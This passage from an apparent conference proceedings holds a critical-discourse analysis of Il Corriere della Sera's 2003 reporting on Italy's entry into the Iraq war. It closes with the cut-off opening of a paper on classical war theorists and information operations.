Wikipedia. (2010). Vhembe District Municipality. Available from: http://en.wikipedia.org/wiki/ Vhembe_<br />
District_Municipality (Accessed 2 February 2011).<br />
121
Missionaries of Peace – The Creation of the Italian Identity <strong>in</strong><br />
the Representation of the Political Discussion <strong>in</strong> Favour of<br />
Italy’s Participation <strong>in</strong> the Iraq War <strong>in</strong> Il Corriere della Sera<br />
Marja Härmänmaa<br />
University of Hels<strong>in</strong>ki, F<strong>in</strong>land<br />
marja.harmanmaa@hels<strong>in</strong>ki.fi<br />
Abstract: L<strong>in</strong>guistics is not a traditional method used <strong>in</strong> the security studies. However, today’s world, and the<br />
<strong>in</strong>formation society are ever more based on texts and images. Also, both the sense of security and a threat are<br />
produced with language at the first place. For this reason, the study of a discourse used <strong>in</strong> a conflict is of vital<br />
importance. The present paper will deal with the political debate <strong>in</strong> favour of Italy’s participation <strong>in</strong> the Iraq war <strong>in</strong> the<br />
spr<strong>in</strong>g of 2003, as it is represented <strong>in</strong> one of Italy’s most important newspapers, Il Corriere della Sera. In us<strong>in</strong>g the<br />
term ‘representation’ I mean the <strong>in</strong>terpretation of a given phenomenon with language. Accord<strong>in</strong>g to the method of<br />
critical l<strong>in</strong>guistics elaborated by Roger Fowler, Robert Hodge and Gunther Kress, and based on the functional<br />
grammar of M.A.K. Halliday, I shall analyse the vocabulary and nam<strong>in</strong>g of different elements related to warfare, and<br />
transitivity; I will exam<strong>in</strong>e the choice of agents and affected participants and types of predicates to which they are<br />
related, as well as the argumentation strategies. In conclusion, I shall show how the representation of the Iraq war<br />
contributes to the creation of and/or emphasis on a specific national Italian identity.<br />
Keywords: Italy’s national identity; Iraq war; discourse analyses; political discourse; media discourse; right-w<strong>in</strong>g<br />
coalition<br />
The war <strong>in</strong> Iraq officially began on March 19, 2003, when the United States started to bombard the<br />
country. The follow<strong>in</strong>g day the US troops crossed the Southern border of Iraq from Kuwait and entered<br />
the country. Before the <strong>in</strong>vasion, Wash<strong>in</strong>gton had asked for Italy’s will<strong>in</strong>gness to offer first logistical and<br />
later direct military help if the war should start (Sarzan<strong>in</strong>i, 10.4.2003). Public op<strong>in</strong>ion and the leftist parties<br />
of the political opposition <strong>in</strong> government <strong>in</strong> Italy had been very much aga<strong>in</strong>st any k<strong>in</strong>d of Italian<br />
<strong>in</strong>volvement, and demonstrations and strikes aga<strong>in</strong>st the war started before the US <strong>in</strong>vasion and<br />
cont<strong>in</strong>ued after. Although the right-w<strong>in</strong>g government <strong>in</strong>itially denied any possible Italian <strong>in</strong>volvement <strong>in</strong> the<br />
warfare when it began, the lead<strong>in</strong>g politicians slowly started to change their op<strong>in</strong>ions. At the end of<br />
March, Italy gave permission to the US to send American parachutists from Italy to Iraq. Around April 10<br />
the Italian Prime m<strong>in</strong>ister, Silvio Berlusconi, started to talk <strong>in</strong> public about the possibility of an offer of<br />
concrete military aid to the US (Di Caro, 11.4.2003). A few days later (April 15) first the Senate and then<br />
the parliament voted <strong>in</strong> favour of send<strong>in</strong>g approximately 3000 Italian soldiers to Iraq <strong>in</strong> May: <strong>in</strong> the<br />
parliament the decision was approved by 308 deputies, 31 voted aga<strong>in</strong>st and 159 absta<strong>in</strong>ed. In the<br />
Senate the decision was approved with 153 votes, 26 voted aga<strong>in</strong>st and 2 absta<strong>in</strong>ed.<br />
(Caprara,16.4.2003) Soon after President Bush had proclaimed on May 1, 2003 that the war was ended,<br />
Italian troops left for Iraq, where they stayed until December 2, 2006.<br />
This paper focuses on the representation of the Iraq war by the Italian rul<strong>in</strong>g politicians as they argued <strong>in</strong><br />
favour of Italy’s participation and as it was reported <strong>in</strong> an Italian newspaper. By representation I mean the<br />
<strong>in</strong>terpretation given of a phenomenon with language. I am ma<strong>in</strong>ly us<strong>in</strong>g the method of critical l<strong>in</strong>guistics<br />
as it was developed at the first place by Roger Fowler, Robert Hodge and Gunther Kress. Based on the<br />
systemic-functional grammar of M.A.K. Halliday, critical l<strong>in</strong>guistics is one method of critical discourse<br />
analyses. In this k<strong>in</strong>d of representational analysis especially crucial features are the nam<strong>in</strong>g and<br />
transitivity. (Fowler, Hodge, Cress and Trew 1979; Fairclough 1995; Hodge and Cress 1996; Lehtonen<br />
2000, 44-48).<br />
Representation is always created from a specific ideological po<strong>in</strong>t of view. Accord<strong>in</strong>g to critical l<strong>in</strong>guistic<br />
theory, any aspect of l<strong>in</strong>guistic structure, whether phonological, syntactic, lexical, semantic, pragmatic or<br />
textual, can carry ideological significance; <strong>in</strong> other words, ideology differs systematically <strong>in</strong> different forms<br />
of expression, <strong>in</strong> different choices of words and grammatical phras<strong>in</strong>g. (Fowler 1991, 36, 66, 67) As<br />
sociologists nowadays agree, newspapers or media, <strong>in</strong>stead of reflect<strong>in</strong>g reality, rather produce it from a<br />
certa<strong>in</strong> ideological po<strong>in</strong>t of view. The news is one product among others. Its publication is the result of a<br />
complex selection that reflects the ideology of the newspaper and the society to which it is addressed:<br />
these factors not only give relevance to a phenomenon reported as news, but also <strong>in</strong>dicate how it is<br />
reported. (Fowler 1991; Fairclough 1995)<br />
122
Marja Härmänmaa<br />
This research is based on articles published between March 19 and May 1, 2003 <strong>in</strong> the most sold and<br />
read Italian newspaper, namely Il Corriere della Sera. The paper was founded <strong>in</strong> Milan on March 5,1876,<br />
and many prom<strong>in</strong>ent Italian <strong>in</strong>tellectuals and writers have collaborated with it. Nowadays the newspaper<br />
belongs to RCS MediaGroup, the first Italian publisher that has developed a strong <strong>in</strong>ternational presence<br />
<strong>in</strong> the sector of daily newspapers, and even has <strong>in</strong>terests <strong>in</strong> the Spanish market, through the company<br />
Unedisa that publishes the daily El Mundo. Over a half of the shares of RCS Media Group is owned by<br />
large enterprises (FIAT holds about 10%) and banks: Mediobanca S.p.A., Italy’s lead<strong>in</strong>g bank<strong>in</strong>g group,<br />
is the ma<strong>in</strong> shareholder with over 13% of the shares. From a political po<strong>in</strong>t of view, Il Corriere della Sera<br />
is <strong>in</strong>dependent, but it is situated <strong>in</strong> the centre-right. It is distributed all over the world and it has daily<br />
edited, free Internet sites. 1<br />
For the present research, I have studied the articles <strong>in</strong> Il Corriere della Sera’s Internet archives, 2 where it<br />
seems to have stored all the past numbers from 1991 onward; only the photographic material is lack<strong>in</strong>g.<br />
The articles conserved <strong>in</strong> the Internet archive are merely news, whilst there are fewer comments or<br />
editorials. The central feature of the news about the political decision-mak<strong>in</strong>g is the abundance of direct<br />
quotations from politicians’ speeches or their words, <strong>in</strong> most cases <strong>in</strong>dicated by quotation marks. The<br />
quotations <strong>in</strong> the press have two basic functions: on the one hand, they are used to emphasise certa<strong>in</strong><br />
words or expressions, and on the other, to mark a citation. The mean<strong>in</strong>g of a citation is to make the text<br />
more “objective”, to create an illusion that th<strong>in</strong>gs speak for themselves. (Tuomarla 2000: 163) For this<br />
reason the direct, explicit voice of the newspaper on some occasions seems to be lack<strong>in</strong>g, and what I am<br />
merely study<strong>in</strong>g is the language that the politicians have used and that has subsequently been reported<br />
<strong>in</strong> the articles. Of course the “objectivity” is only an illusion, s<strong>in</strong>ce the author subjectively chooses what to<br />
put <strong>in</strong> the text, which words or statements to report, even as direct quotations. Plus, <strong>in</strong> many cases the<br />
language used by the politicians co<strong>in</strong>cides with the language of the newspaper: the terms, expressions or<br />
statements that on some occasions might be between quotation marks, on the others are used directly by<br />
the journalist. However, with this tactical choice of us<strong>in</strong>g citations the author is able to avoid mak<strong>in</strong>g<br />
statements of his/her own, and <strong>in</strong>stead puts him-/herself <strong>in</strong> the background <strong>in</strong> the role of a mere objective<br />
observer.<br />
Also the decisions the author considers to have “news value”, and thus report as news, are made<br />
subjectively. By archiv<strong>in</strong>g the articles about the political decision mak<strong>in</strong>g, Il Corriere della Sera <strong>in</strong>itially<br />
shows its normal <strong>in</strong>terest <strong>in</strong> domestic politics, and secondly, it assumes the role of mediator: the paper<br />
<strong>in</strong>forms the public about the po<strong>in</strong>t of view of the Italian politicians, by report<strong>in</strong>g what they have said about<br />
the matter. The articles <strong>in</strong> the Internet could thus be considered as a sort of archive of historical<br />
documents (<strong>in</strong>stead of news articles only), with which one could reconstruct the chronology of the<br />
decision-mak<strong>in</strong>g that led to Italy’s participation <strong>in</strong> the war.<br />
The image of the war that emerges from these particular articles is extremely abstract and sterile.<br />
Whereas the ma<strong>in</strong> protagonists are the Italian politicians or Italy as a country, there are no real warriors.<br />
Dur<strong>in</strong>g the whole period, the aggressors <strong>in</strong> Iraq, George Bush or Saddam Husse<strong>in</strong>, the orig<strong>in</strong>al reason for<br />
the war, and the Iraqi people are hardly mentioned at all. The tragic events that on the frontl<strong>in</strong>e led to the<br />
destruction of the Iraqi army, as well as the brutal attacks aga<strong>in</strong>st civilians by the US forces that all<br />
caused thousands of casualties with<strong>in</strong> the first few weeks of the war are mentioned very little, if at all.<br />
The war that is discussed by the politicians is truly a paper war without weapons or victims, or reason: it<br />
is a war fought among the politicians about the mean<strong>in</strong>g of the terms hav<strong>in</strong>g as a f<strong>in</strong>al aim the shipment<br />
of Italian troops to Iraq with valid justification.<br />
One l<strong>in</strong>guistic strategy that renders the representation of the war ever more abstract is the abundance of<br />
mental and verbal actions, whilst there are very few physical ones. As normally <strong>in</strong> political language, here<br />
too people are “say<strong>in</strong>g”, “consider<strong>in</strong>g” or “decid<strong>in</strong>g”, <strong>in</strong>stead of “attack<strong>in</strong>g”, “shoot<strong>in</strong>g”, or “bombard<strong>in</strong>g”,<br />
which would be rather normal terms <strong>in</strong> an article about a war. Also the metaphorical representation of<br />
processes as entities with the nom<strong>in</strong>alization of the verbs contributes to the idea that it is more a question<br />
about an <strong>in</strong>tangible dilemma <strong>in</strong>stead of a concrete course of action and a human catastrophe. For<br />
<strong>in</strong>stance, when the newspaper writes about “send<strong>in</strong>g of the Italian troops on an operation of<br />
peacekeep<strong>in</strong>g <strong>in</strong> Iraq” (Verderami, 15.4.2003), not only the verb and the agent are miss<strong>in</strong>g, but also the<br />
true nature of the action fades away <strong>in</strong> a vague noun: “the operation of peacekeep<strong>in</strong>g”.<br />
1 See the <strong>in</strong>formation delivered by RCS Mediagroup on their Internet home page<br />
http://www.rcsmediagroup.it/wps/portal/mg/home/?language=it<br />
2 http://archiviostorico.corriere.it/<br />
123
Marja Härmänmaa<br />
In most cases the event itself is explicitly called “war” (la guerra), however, usually there is no<br />
specification where or aga<strong>in</strong>st whom the war is conducted. In some cases it is mentioned that the war is<br />
<strong>in</strong> Iraq (la guerra <strong>in</strong> Iraq). Only <strong>in</strong> one case is it specified, that the war is actually fought “aga<strong>in</strong>st” Iraq<br />
(l’imm<strong>in</strong>ente guerra all’Iraq). There are also numerous synonyms and quasi-synonyms, as usually, when<br />
the topic is of a particular preoccupation or problem. (Fowler 1991, 85). On many occasions, to soften the<br />
significance of ‘war’ the journalists have used alternative words, such as ‘conflict’ (un conflitto), ‘military<br />
<strong>in</strong>tervention’ (l’<strong>in</strong>tervento militare), ‘direct <strong>in</strong>tervention’ (l’<strong>in</strong>tervento diretto), ‘offensive actions’ (azioni<br />
offensive). Only <strong>in</strong> few cases are the “real responsible” for these “actions” mentioned, and the operation<br />
is called ‘US <strong>in</strong>tervention’ (l’<strong>in</strong>tervento Usa) or ‘the angloamerican attack’ (l’attacco angloamericano),<br />
even though, here as well the process is nom<strong>in</strong>alised and the agent disappears <strong>in</strong> the adjective.<br />
Negotiat<strong>in</strong>g the political l<strong>in</strong>e of a country can be considered as a negotiation of the country’s identity. By<br />
creat<strong>in</strong>g or emphasis<strong>in</strong>g a certa<strong>in</strong> identity politicians are able to justify a certa<strong>in</strong> role <strong>in</strong> the field of<br />
<strong>in</strong>ternational politics. 3 In this case the Italian government at any price wanted the country to have an<br />
active role and participate <strong>in</strong> the war – regardless of the fact that public op<strong>in</strong>ion was aga<strong>in</strong>st it. To susta<strong>in</strong><br />
their po<strong>in</strong>t of view, the politicians have to know which positions the public will accept, which positions<br />
must be defended, and how these positions should be defended. In other words, the politicians have to<br />
be aware of the Italians’ <strong>in</strong>nate “identity”: which are their <strong>in</strong>terests, values and beliefs. (Lo Cascio 1991;<br />
Perelman 1996) This will have an effect on the strategies of argumentation, the authorities to whom<br />
apply, and the term<strong>in</strong>ology. Vocabulary is of great <strong>in</strong>terest, for it can be regarded as a representation of<br />
the world for a certa<strong>in</strong> culture; or as the world is perceived accord<strong>in</strong>g to the ideological needs of a culture.<br />
(Fowler 1991, 82)<br />
Before the parliament was to take the decision about Italy’s military participation <strong>in</strong> the war on April 15,<br />
the authorities to whom the newspaper appeals are the US and Great Brita<strong>in</strong>: the Prime m<strong>in</strong>ister<br />
Berlusconi will send military troops to Iraq as the US and Great Brita<strong>in</strong> have asked, and as the Italian<br />
Prime m<strong>in</strong>ister Silvio Berlusconi had promised <strong>in</strong> a phone call to President Bush before the war started.<br />
(Sarzan<strong>in</strong>i, 10.4.2003; Di Caro, 11.4.2003; Verderami, 15.4.2003) With such an argumentation, the rightw<strong>in</strong>g<br />
government not only openly showed its pro-American policy, but also Italy is represented as a<br />
reliable country that cannot, and will not resc<strong>in</strong>d a promise it has given – although it is questionable,<br />
whether Prime m<strong>in</strong>ister Berlusconi had the right to make such a promise on his own. In addition, Italy’s<br />
presence <strong>in</strong> Iraq among the first foreign countries becomes a sign of its political prestige on the<br />
<strong>in</strong>ternational level. There is the urge to hasten, as Poland is already <strong>in</strong> Iraq, whilst Spa<strong>in</strong>, Denmark,<br />
Holland and Portugal are about to go there too. (Verderami, 15.4.2003) The crav<strong>in</strong>g to ga<strong>in</strong> political<br />
importance with the participation <strong>in</strong> the war is also evident <strong>in</strong> the titles of the articles, such as “The phase<br />
of emergency starts and our country will participate among the first ones” (Sarzan<strong>in</strong>i, 10.4.2003), or “We<br />
and the USA will sow democracy” (Di Caro, 17.4.2003) that gives the idea of a close collaboration<br />
between the US and Italy <strong>in</strong> the adm<strong>in</strong>istration of Iraq. In “With<strong>in</strong> six months a command to Italy” (Nese,<br />
4.5.2003) the title is almost mislead<strong>in</strong>g, as the topic of the article concerns the quality and quantity of the<br />
troops that will be sent to Iraq, whilst a hypotheses about the organisation of the adm<strong>in</strong>istration of the<br />
foreign soldiers is mentioned only briefly.<br />
Nevertheless, Italy is not only a Catholic country among others, but it is the very centre of Catholicism.<br />
The strong presence of the Catholic Church has an <strong>in</strong>fluence on social life and civilian values.<br />
Furthermore, Italy was one of the aggressors <strong>in</strong> the Second World War, the memory of which and a sort<br />
of shame still persists among the adult population of the country. Therefore, any argumentation on behalf<br />
of send<strong>in</strong>g soldiers to an occupied country to help the aggressor, aga<strong>in</strong>st <strong>in</strong>ternational law and without<br />
the consent of the UN, based on any k<strong>in</strong>d of utility, would simply be unacceptable to the great majority of<br />
the people. Instead, the ma<strong>in</strong> reasons why Italy should participate <strong>in</strong> the war, are humanitarian.<br />
Halliday has used the term ‘anti-language’ for the cases <strong>in</strong> which the words change their mean<strong>in</strong>g.<br />
(Halliday 1976) In the discourse of the right-w<strong>in</strong>g politicians, help<strong>in</strong>g the <strong>in</strong>vader to control a foreign<br />
country is transformed <strong>in</strong>to ‘peace-keep<strong>in</strong>g’. The activity of the Italians <strong>in</strong> Iraq will concern peace, which,<br />
on the other hand, shows the capacity of the politicians to foresee the future, s<strong>in</strong>ce dur<strong>in</strong>g the publication<br />
of these articles the war was still go<strong>in</strong>g on: the Italian “soldiers [go] to Iraq for peace”, there will be sent<br />
“an Italian body of peace” that is “ready to participate <strong>in</strong> peace-keep<strong>in</strong>g”. The Italian one is “a mission that<br />
will guarantee peace <strong>in</strong> Iraq”. Alternatively, the reasons are related to charity. The Italians will “do this<br />
3 Researchers from different discipl<strong>in</strong>es have different def<strong>in</strong>itions of terms like ’identity’, ’role’, ’self’, ’subject’, and so on. Here I<br />
agree with Ivanič, accord<strong>in</strong>g to whom the term ‘role’ “refers to the public, <strong>in</strong>stitutionally def<strong>in</strong>ed aspect of identity”, whilst ‘identity’ is<br />
a more private aspect (Ivanič 1998, 10).<br />
124
Marja Härmänmaa<br />
task to defend the population”. The approximately 3000 soldiers will be sent to Iraq for “humanitarian<br />
purpose”, to “guarantee the aid”, to “br<strong>in</strong>g humanitarian help to tormented Iraq” (Fregonara, 14.4.2003)<br />
and “<strong>in</strong> order to alleviate the suffer<strong>in</strong>gs of the Iraqi people”. (Franchi, 16.4.2003) The government has<br />
created a “humanitarian mach<strong>in</strong>e” (Sarzan<strong>in</strong>i 10.4.2003), that will effectuate “a humanitarian <strong>in</strong>tervention”<br />
(Verderami, 13.4.2003), and contribute to “the humanitarian stabilization <strong>in</strong> Iraq”. (Fregonara, 14.4.2003)<br />
In addition to the topics of medic<strong>in</strong>e, sanitation, reconstruction of the streets, bridges and build<strong>in</strong>gs, a<br />
peculiar national characteristic of the Italian discourse about the war is the argumentation on behalf of the<br />
salvation of Iraqi cultural heritage. It is mentioned <strong>in</strong> different articles that the Italians will work to rescue<br />
the historical monuments and works of art. (Nese, 18.4.2003; Caprara, 20.4.2003) Yet <strong>in</strong> one article it is<br />
presented as one of the ma<strong>in</strong> reasons to go to Iraq, as the title explicitly states: “On the front l<strong>in</strong>e for<br />
cultural heritage”. (Conti, 4.5.2003)<br />
In all these articles Iraq is represented, when it is represented, as a country that is <strong>in</strong> a state of extreme<br />
confusion, and therefore eagerly needs the Italians to rescue it and to react “to the nightmare of<br />
emergency” created <strong>in</strong> Iraq (Breda, 15.4.2003). S<strong>in</strong>ce no reason is given for this confusion, the result is<br />
that the disorder was born out of noth<strong>in</strong>g, as a natural catastrophe. Plus, it seems to have noth<strong>in</strong>g to do<br />
with the ongo<strong>in</strong>g warfare, s<strong>in</strong>ce the only concrete attributions about the nature of the disaster are related<br />
to crim<strong>in</strong>ality: it is “a country at the mercy of corruption, of speculation, of black market, of robbery and of<br />
spread<strong>in</strong>g crim<strong>in</strong>ality”, a “disastrous country” (Nese, 5.5.2003), a country of “plunder<strong>in</strong>g and banditry”.<br />
(Caprara, 20.4.2003) The Iraqi people are mentioned only once as a passive group with no will of their<br />
own nor capacity to react <strong>in</strong> any way to the “crim<strong>in</strong>ality” that somehow and suddenly “has spread” <strong>in</strong> their<br />
home country, and for this reason: “the Iraqi people cannot be left alone”, whereas from Italy’s part, “it<br />
would only be vile not to stop the agony of Iraq”. (Verderami, 13.4.2003)<br />
The most current term used to describe the nevertheless obscure activity of the Italians <strong>in</strong> Iraq, the true<br />
slogan of this cruel and disastrous adventure, is ‘mission’ (la missione). This term, <strong>in</strong> Italian, has many<br />
connotations and can be used <strong>in</strong> military, political, civic or religious mean<strong>in</strong>g. In any case, it always<br />
conta<strong>in</strong>s the idea of devotion, moral obligation or duty towards the army, the State, the society or the<br />
Church that has given the commission. (Lo Z<strong>in</strong>garelli 2003) It is repeatedly mentioned <strong>in</strong> articles that the<br />
Italians have a mission <strong>in</strong> Iraq. (Breda, 15.4.2003) It is: “a humanitarian mission of the Italian<br />
government”; a mission “that will guarantee peace”; a mission for the freedom of the country: “the mission<br />
Iraqi freedom”. (Verderami, 15.4.2003)<br />
Thus, <strong>in</strong> these articles, will<strong>in</strong>gly or not, like the Iraqi people, also the Italians are transformed <strong>in</strong>to a group<br />
of unconscious people, unable to take the decision of how to act and react <strong>in</strong> the face of war. Go<strong>in</strong>g to<br />
Iraq is represented as an obligation or a duty that they simply cannot decl<strong>in</strong>e -- even though, it is not<br />
po<strong>in</strong>ted out, who creates this obligation, nor what k<strong>in</strong>d of sacrifices the fill<strong>in</strong>g of this duty actually will<br />
require, neither <strong>in</strong> what the duty will actually entail. Nevertheless, “Italy, therefore, will do her duty” as the<br />
Italians “cannot and [they] must not stay unarmed <strong>in</strong> front of the situation of Iraq after the war”. And, s<strong>in</strong>ce<br />
the Italians were “fully aware of [their] role” (Verderami, 13.4.2003), they went to Iraq, and stayed there<br />
over two years.<br />
Conclusion: “The humanitarian mission[s] of the Italian government[s]”<br />
There is an Italian proverb accord<strong>in</strong>g to which “Il lupo cambia il pelo ma non il vizio” that literally<br />
translated <strong>in</strong> English would be: “The wolf changes the hair but not the vice.” The notion of “the Italians’<br />
mission <strong>in</strong> the world” was peculiar already to Giuseppe Mazz<strong>in</strong>i (1805-1872), a great 19 th -century<br />
politician, a lead<strong>in</strong>g figure of liberal nationalism, as well as of Il Risorgimento, the unification of Italy.<br />
Mazz<strong>in</strong>i’s political rhetoric is full of religious terms that reflect his religious concept of Nation, Fatherland<br />
and politics <strong>in</strong> general. Accord<strong>in</strong>g to Mazz<strong>in</strong>i, the Italians’ had a special “mission that [no more no less]<br />
God had given”, a “duty towards humanity”, “to fight wherever for the liberty of the people”. Mazz<strong>in</strong>i<br />
justified his ideas with the concept of the Italians as heirs of all the values Rome represented and with<br />
the significance of the city of Rome <strong>in</strong> Western history and. Accord<strong>in</strong>g to him, Rome had been twice<br />
“metropolis”, “the Temple” of Europe, as it had worked for the unification of the cont<strong>in</strong>ent, first dur<strong>in</strong>g the<br />
Roman Empire and after when it became the centre of the Christianity. (Mazz<strong>in</strong>i 1860.)<br />
The glorification of Roman history, plac<strong>in</strong>g the eternal city as a model for arts and for social life, and the<br />
idea of the Italians as its successors is a constant feature <strong>in</strong> the history of Italy. It manifested itself<br />
particularly <strong>in</strong> the Renaissance, and <strong>in</strong> the twentieth century, when Fascism adopted the cult of Rome,<br />
125
Marja Härmänmaa<br />
romanità, to serve its ever more aggressive political goals. (Visser 1992) Though the tradition of classical<br />
culture persists even today <strong>in</strong> Italy as elsewhere <strong>in</strong> the Western world, accord<strong>in</strong>g to an Italian historian,<br />
Antonio La Penna, the disastrous Second World War and the end of Fascism anyway made the Italians<br />
renounce the idea of be<strong>in</strong>g the privileged heirs of ancient Rome. (La Penna 1973, 1326)<br />
The Italian government that took the decision to send troops to Iraq was composed of a coalition of rightw<strong>in</strong>g<br />
parties, among which the most important are Forza Italia, a populist neo-liberalist party of the Prime<br />
m<strong>in</strong>ister, Silvio Berlusconi, and Alleanza Nazionale, classified by the political scientists as a post-Fascist<br />
party, the secretary of which, Gianfranco F<strong>in</strong>i, was the Vice prime m<strong>in</strong>ister <strong>in</strong> spr<strong>in</strong>g 2003. (Ignazi 1994;<br />
Tarchi 1995)<br />
To ga<strong>in</strong> an important role <strong>in</strong> <strong>in</strong>ternational politics has been the goal of Italian politicians s<strong>in</strong>ce the<br />
unification of the country, from the second half of the n<strong>in</strong>eteenth century till now. Italy could justify its<br />
claims on economic grounds (the country was a member of the former G7) or on demography (with a<br />
population of more than 60 million <strong>in</strong>habitants, it was the fourth largest country <strong>in</strong> the EU at that time).<br />
However, this is not the case. As <strong>in</strong> Mazz<strong>in</strong>i’s rhetoric the justification is found <strong>in</strong> the <strong>in</strong>tr<strong>in</strong>sic Italian spirit<br />
and <strong>in</strong> history, so the Berlusconi government’s argumentation appealed to the Italian role <strong>in</strong> the world as<br />
missionaries of goodwill. There are clear aff<strong>in</strong>ities between the rhetoric of Mazz<strong>in</strong>i and of the government<br />
<strong>in</strong> the spr<strong>in</strong>g of 2003; yet the latter, <strong>in</strong>stead of Roman legionaries, sent to “Mesopotamia” a group of<br />
“Catholic Sa<strong>in</strong>ts”. Whether <strong>in</strong> practice there is any difference between these two, is another question.<br />
References<br />
Breda, M. (15.4.2003) “Emergenza umanitaria, l’apertura del Quir<strong>in</strong>ale” Il Corriere della Sera.<br />
Caprara, M. (16.4.2003) “Il parlamento vara la missione a Bagdad” Il Corriere della Sera.<br />
Caprara, M. (20.4.2003) “Soldati al Sud, aiuti al Nord. Doppio problema per l’Italia” Il Corriere della Sera.<br />
Di Caro, P. (11.4.2003) “’Non conto sulla s<strong>in</strong>istra per l’Iraq’” Il Corriere della Sera.<br />
Di Caro, P. (17.4.2003) “Noi e gli Usa sem<strong>in</strong>eremo democrazia” Il Corriere della Sera.<br />
Fairclough, N. (1995) Media Disourse, Arnold, London.<br />
Fowler, R. (1991) Language <strong>in</strong> the News. Discourse and Ideology <strong>in</strong> the Press, Routledge, London and New York.<br />
Fowler, R., Hodge, B., Kress, G. and Trew, T. (1979) Language and Control, Routledge, London.<br />
Franchi, P. (16.4.2003) “Ritorno alla ragione” Il Corriere della Sera.<br />
Fregonara, G. (14.4.2003) “Aiuti e truppe, doma<strong>in</strong> il voto” Il Corriere della Sera.<br />
Halliday, M.A.K. (1976) Language as Social Semiotic. The Social Interpretation of Language and Mean<strong>in</strong>g, Edward<br />
Arnold, London.<br />
Hodge, B. and Kress, G. (1996) Language as Ideology, Routledge, London. http://archiviostorico.corriere.it/<br />
http://www.rcsmediagroup.it/wps/portal/mg/home/?language=it<br />
Ignazi, P. (1994) Postfascisti? Dal Movimento sociale italiano ad Alleanza nazionale,<br />
Bologna, Il Mul<strong>in</strong>o.<br />
Ivanič, R. (1998) Writ<strong>in</strong>g and Identity: The discoursal construction of identity <strong>in</strong> academic writ<strong>in</strong>g, John Benjam<strong>in</strong>s,<br />
Amsterdam.<br />
La Penna, A. (1973) “La tradizione classica nella cultura italiana.” Storia d’Italia, vol. II. E<strong>in</strong>audi, Tor<strong>in</strong>o.<br />
Lehtonen, M. (2000) Merkitysten maailma. Kulttuurisen tekst<strong>in</strong>tutkimuksen lähtökohtia . Vastapa<strong>in</strong>o, Tampere.<br />
Lo Cascio, V. (1991) Grammatica dell’argomentare. Strategie e strutture, La Nuova Italia, Scandicci.<br />
Lo Z<strong>in</strong>garelli (2003) Vocabolario della l<strong>in</strong>gua italiana di Nicola Z<strong>in</strong>garelli, Zanichelli, Bologna.<br />
Mazz<strong>in</strong>i, G. (1860) Doveri dell’uomo, http://www.liberliber.it/biblioteca/m/mazz<strong>in</strong>i/<strong>in</strong>dex.htm<br />
Nese, M. (18.4.2003) “Soldati e mezzi a Bagdad non prima di due mesi e sotto comando <strong>in</strong>glese” Il Corriere della<br />
Sera.<br />
Nese, M. (4.5.2003) “Agli italiani il controllo dei villaggi” Il Corriere della Sera.<br />
Perelman, C. (1996) Retoriikan valtakunta [L’empire rhétorique], Vastapa<strong>in</strong>o, Tampere.<br />
Sarzan<strong>in</strong>i, F. (10.4.2003) “La squadra: carab<strong>in</strong>ieri, sm<strong>in</strong>atori ed esperti di armi chimiche” Il Corriere della Sera<br />
Tarchi, M. (1995) C<strong>in</strong>quant’anni di nostalgia. La destra italiana dopo il fascismo, Rizzoli, Milano.<br />
Tuomarla, U. (2000) La citation mode d'emploi sur le fonctionnement discursif du discours rapporte direct,<br />
Suomala<strong>in</strong>en Tiedeakatemia, Hels<strong>in</strong>ki<br />
Verderami, F. (13.4.2003) “I Paesi amici dei terroristi ora lo sanno Possibile colpire chi mianccia la pace” Il Corriere<br />
della Sera.<br />
Verderami, F. (15.4.2003) “Un patto con Bush prima della Guerra: subito forze italiane” Il Corriere della Sera.<br />
Visser, R. (1992) “Fascist Doctr<strong>in</strong>e and the Cult of the Romanità” Journal of Contemporary History, Vol. 27, No. 1,<br />
pp.5-22.<br />
126
Thoughts of war Theorists on Information Operations<br />
Arto Hirvelä<br />
National Defence University, Hels<strong>in</strong>ki, F<strong>in</strong>land<br />
arto.hirvela@mil.fi<br />
Abstract: Information operations (INFO OPS) <strong>in</strong>crease <strong>in</strong> value as a means to reach ends <strong>in</strong> wars and lesser crises.<br />
Nowadays, the effectiveness of <strong>in</strong>formation operations depends on knowledge and the control of all of its different<br />
aspects as well as on the ability to utilize superior technology. Not all methods of INFO OPS require a significant<br />
technological advantage, nor are they generated by it even though a great many of the vulnerabilities are based on<br />
technology. Even some ancient war theorists have written about the value of some INFO OPS methods, e.g.,<br />
psychological operations and military deception. Even though psychological operations as such were not <strong>in</strong>cluded <strong>in</strong><br />
war plans <strong>in</strong> the age of the war theorists covered <strong>in</strong> this article due to a lack of media, proper means and the<br />
slowness of communication, every theorist acknowledged the value of psychological operations. Revolution <strong>in</strong><br />
military affairs (RMA) has been discussed at length by military researchers. INFO OPS is one of the concepts been<br />
used to rationalize RMA. Consequently the development of INFO OPS must be scrut<strong>in</strong>ised. In this article the<br />
thoughts of war theorists Sun Tzu, Flavius Vegetius Renatus, Maurice de Saxe, Napoleon Bonaparte, Carl von<br />
Clausewitz and Sir Basil Liddell Hart are analyzed from viewpo<strong>in</strong>t of various aspects of INFO OPS. The analysis<br />
concentrates on psychological operations, on military deception and on operations security. The analysis is based on<br />
a loose framework of content analysis.<br />
Keywords: <strong>in</strong>formation operations, psychological operations, military deception, operations security, war theorist<br />
1. Introduction<br />
Even without hav<strong>in</strong>g modern <strong>in</strong>formation technology to reach the masses, war theorists perceived the<br />
value of the methods that we now call <strong>in</strong>formation warfare or <strong>in</strong>formation operations. The tools of<br />
psychological operations and military deception were obviously different then but the advantages of these<br />
methods and operations security have existed s<strong>in</strong>ce the concept of war was <strong>in</strong>vented. This is clearly<br />
present even <strong>in</strong> the writ<strong>in</strong>gs of the ancient war theorists’.<br />
Affect<strong>in</strong>g opponent’s morale <strong>in</strong> previous times is what we now call Psychological Operations.<br />
Psychological Operations (PSYOPS) are described as planned psychological activities us<strong>in</strong>g methods of<br />
communication. This <strong>in</strong>cludes the use of media products, face-to-face communication and other means<br />
directed at target audiences <strong>in</strong> order to <strong>in</strong>fluence perceptions, attitudes and behaviour <strong>in</strong> order to reach<br />
political and military objectives. Present-day PSYOPS are conducted to convey selected <strong>in</strong>formation and<br />
<strong>in</strong>dicators to governments, organisations, populations, groups and <strong>in</strong>dividuals, with the aim of ultimately<br />
chang<strong>in</strong>g their behaviour and decisions. These aims do not differ from the aims that the aforementioned<br />
theorists describe. Successful PSYOPS weaken the will of an adversary, re<strong>in</strong>force the feel<strong>in</strong>gs, stimulate<br />
the co-operation of the loyal and sympathetic, and ga<strong>in</strong> the support of the uncommitted. (MNIOE 2009)<br />
Deception has been the decisive part of many successful offensives. Deception is complex and demands<br />
